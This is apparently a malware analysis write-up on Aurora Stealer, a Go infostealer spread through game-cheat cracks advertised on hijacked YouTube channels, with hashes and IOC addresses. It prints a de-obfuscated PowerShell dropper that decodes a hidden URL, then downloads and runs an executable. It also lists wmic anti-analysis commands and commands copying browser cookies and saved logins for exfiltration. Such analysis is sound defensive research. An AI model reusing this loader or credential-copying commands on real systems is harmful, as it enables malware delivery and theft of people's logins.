AC1DF0X VAULT

Aurora Stealer Analysis

Overview:
This research will cover Aurora Stealer, a stealer written in golang.

Dropper SHA256: a774163cffc40309ec4399c67a0c24a6c3194695c881429fb62c6019f8b7f66f
Aurora SHA256: 3dbde13894aa65f33217ab351dd3f5c4fb54d570b3371fef1505a7370aab4168

IOC's 
http://185.246.221.126
https://cheat4.biz
212.87.204.92


Distribution:
Malicious actors have been known to hijack popular YouTube accounts with a large number of subscribers and use them to promote their nefarious activities. Aurora stealer operators will upload videos to the channel that contain links to malicious websites or downloads. In order to ensure maximum visibility, the operators use search engine optimization (SEO) tags to make the video appear higher in search engine results. The following image is from Morphisec.



Aurora is commonly distributed in the form of software cracks for popular applications, such as VPNs. However, in this research, it has been shown that the main distribution method for Aurora stealer is through game cheat cracks that are being advertised on YouTube as mentioned above.




Technical Analysis:
Aurora stealer primarily uses direct executable (.exe) downloads as its initial dropping method. However, there are other forms of droppers that it employs, such as hta files. These files are commonly used to execute VBScript or JScript, which can then download and execute the next stage malware.

Upon examining the hta dropper used in an Aurora campaign, it becomes evident that it has been deliberately obfuscated in an effort to evade detection by antivirus and endpoint detection and response (AV/EDR) systems, as well as static analysis by researchers. However, this type of VBScript obfuscation has been employed many times before.



By utilizing dynamic sandbox analysis, the hta dropper can be analyzed in a more efficient manner. The dropper contains an obfuscated PowerShell command that communicates with a staging server to download the next stage of malware.



After de-obfuscating the powershell, it would look something like this. 
function Download-File($url, $path){
    [System.IO.File]::WriteAllBytes($path, (Invoke-WebRequest -Uri $url).Content)
}

function Execute-File($path){
    if ($path.EndsWith(".exe")) {
        Start-Process $path
    } else {
        Start-Process "powershell.exe" "-ExecutionPolicy Bypass -File `"$path`""
    }
}

function Get-DecodedString($encodedString){
    $decodedString = ""
    $encodingOffset = 53201
    foreach($char in $encodedString){
        $decodedString += [char]($char - $encodingOffset)
    }
    return $decodedString
}

function Main(){
    $downloadUrl = Get-DecodedString @(53305,53317,53317,53313,53259,53248,53248,53250,53257,53254,53247,53251,53253,53255,53247,53251,53251,53250,53247,53250,53251,53255,53248,53299,53306,53311,53316,53248,53251,53249,53251,53252,53247,53302,53321,53302,53247,53302,53321,53302)
    $downloadPath = "$($env:AppData)\2023.exe"
    if (Test-Path -Path $downloadPath){
        Execute-File $downloadPath
    } else {
        Download-File $downloadUrl $downloadPath
        Execute-File $downloadPath
    }
}


By utilizing the tool called Detect It Easy (DIE), it is possible to verify that the downloaded file is a Windows binary based on Golang programming language. Additionally, the entropy of the file is noted to be at a level of 6, indicating that it is not a packed binary.



Upon examining the binary in IDA, it is observed that there are references and calls to the Windows Management Instrumentation Command-line (wmic) utility to gather specific system information. This is achieved by launching the Windows Command Prompt (cmd.exe) in the background and executing wmic commands.



The malware employs an anti-analysis technique by gathering information about specific system hardware, such as the GPU. This is done by executing the following command using wmic: "path win32_VideoController get name". By obtaining this information, the malware can determine if it is running in a virtual environment or if it is being analyzed by a security researcher. This allows the malware to evade detection and continue its malicious activities. Below is a list of all the discovery commands executed. 

wmic csproduct get uuid
wmic os get Caption
wmic path win32_VideoController get name
wmic cpu get name
systeminfo

Aurora, being a type of stealer malware, is expected to target common data locations such as browser information. In line with this expectation, Aurora will copy files related to browsers into a temporary folder. The files are then base64 encoded and sent to the command and control (C2) server. This type of data exfiltration is commonly seen in stealers, as it allows the attacker to collect sensitive information such as login credentials and personal data. Below are example commands that Aurora will run. 

powershell "" "copy \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\XVlBzgbaiC\""

powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History\" \"C:\Users\Admin\AppData\Local\Temp\MRAjWwhTHc\""

powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\SjFbcXoEFf\""

powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\lgTeMaPEZQ\""

powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\leQYhYzRyWJjPjz\""

powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\pfRFEgmota\""

powershell "" "copy \"C:\Users\Admin\AppData\Local\Microsoft\Windows\History\" \"C:\Users\Admin\AppData\Local\Temp\TCoaNatyyi\""